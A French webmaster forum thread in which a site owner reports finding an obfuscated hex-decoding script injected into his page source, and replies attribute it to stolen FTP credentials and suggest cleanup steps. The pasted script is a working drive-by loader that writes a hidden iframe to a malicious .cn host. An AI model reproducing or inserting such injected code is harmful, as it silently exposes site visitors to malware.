Code malveillant sur mes sites !!!

[medjaz]

Bonjour,

Je gère plusieurs sites sur un même hébergement, se matin, complètement par hasard, j'ai trouvé se code en bas de la source d'un des sites :

Code: Tout sélectionner

<script type="text/javascript">
1function tpanvzl(drobhkeuaszqu){var tzvtmrt="";for(oebqunf=0;oebqunf<drobhkeuaszqu.length;oebqunf+=2){tzvtmrt+=
(String.fromCharCode(parseInt(drobhkeuaszqu.substr(oebqunf,2),16)));}document.write(tzvtmrt);}tpanvzl("3Clwpzywjdqk
vqaqv69lwpzywjdqkvqaqv66lwpzywjdqkvqaqv7261lwpzywjdqkvqaqv6D6520lwpzywjdqkvqaqv737263lwpzywjdqkvqaqv3Dlw
pzywjdqkvqaqv22lwpzywjdqkvqaqv6874lwpzywjdqkvqaqv74lwpzywjdqkvqaqv70lwpzywjdqkvqaqv3A2F2Flwpzywjdqkvqaqv6F
72656Elwpzywjdqkvqaqv74lwpzywjdqkvqaqv72lwpzywjdqkvqaqv6166lwpzywjdqkvqaqv66lwpzywjdqkvqaqv2E636E2Flwpzywj
dqkvqaqv696E2E63lwpzywjdqkvqaqv67lwpzywjdqkvqaqv693Flwpzywjdqkvqaqv313122lwpzywjdqkvqaqv20776964lwpzywjdqkvq
aqv7468lwpzywjdqkvqaqv3D30lwpzywjdqkvqaqv2068lwpzywjdqkvqaqv65lwpzywjdqkvqaqv69lwpzywjdqkvqaqv67lwpzywjdqkvq
aqv68743D303E3C2F6966lwpzywjdqkvqaqv72lwpzywjdqkvqaqv61lwpzywjdqkvqaqv6D653Elwpzywjdqkvqaqv".replace(/lwpzywjdqkvqaqv/g, ""));
</script>
<iframe height="0" width="0" src="http://orentraff.cn/in.cgi?11">
<html class="blacklist" xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="stylesheet" href="chrome://global/skin/netError.css" type="text/css" media="all">
</link>
<link id="favicon" rel="icon" type="image/png" href="chrome://global/skin/icons/blacklist_favicon.png"/>
<script type="application/javascript" src="chrome://global/content/strres.js">
</script>
<script type="application/javascript">
</script>
<style type="text/css">
</style>
</head>
<body dir="ltr">
<div id="errorPageContainer">
<div id="errorTitle">
<h1 id="errorTitleText_malware">Site malveillant !</h1>
</div>
<div id="errorLongContent">
<div id="errorShortDesc">
<p id="errorShortDescText_malware">
Le site Web sur
<span id="malware_sitename">orentraff.cn</span>
a été signalé comme étant un site malveillant et a été bloqué sur la base de vos préférences de sécurité.
</p>
</div>
<div id="errorLongDesc">
</div>
<div id="buttons">
</div>
</div>
<div id="ignoreWarning">
<button id="ignoreWarningButton" xmlns:xul="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul" label="Ignorer cet avertissement"/>
</div>
</div>
<script type="application/javascript">
1initPage();
</script>
</body>
</html>
</iframe>

C'est quoi tout ça ???
J'ai aussi trouvé des fichiers bizarre dans différent dossier
Comment ca a pu arrivé ??????????
Quelqu'un peut-il m'eclarcir

[ortolojf]

Evident.

To site a été hacké.

Quelqu'un a eu accès à ton compte FTP, et a modifié tes scripts sur ton site.

Deux causes possibles:

- Ton ordinateur a un virus, et envoie ton login/passwxord quant tu le tapes dans ton logiciel FTP,

- Ou bien ( et aussi ), simplement un hacker a eu accès à ton login/password d'accès FTP.


Donc, ne sachant pas laquelel des deux réponses est la bonne, je te suggère de réinstaller à neuf ton ordi, pour qu'il n'ait plus aucun virus ( Linux c'est bien et/ou le modem ADSL comme routeur ou un routeur ad hoc c'est bien aussi ).

Une fois que tu es sûr que ton ordi n'est plus virusé du tout, tu pourras changer sur le compte de ton hébergeur, les logins/passwords de tous les éléments de ton compte, et aussi ( last but not least ), tous les logins/passwords de tous tes comtes d'accès à distance ( quels qu'ils soient ), qui en comportent.

Voilà, c'est dur à avaler un hack de site, mais faut assumer.

Ton post me réconforte, d'avoir choisi un OS Linux Fedora 8, et une config routeur de ma FreeBox...

Bien à toi.

Amicalement.

Jean-François Ortolo

[Leonick]

Ou bien ( et aussi ), simplement un hacker a eu accès à ton login/password d'accès FTP.

1° chose : ne jamais utiliser comme identifiants pour un serveur ses identifiants sur des sites lambda.
ne pas prendre de password trop simple (un prénom, une date ou autre)...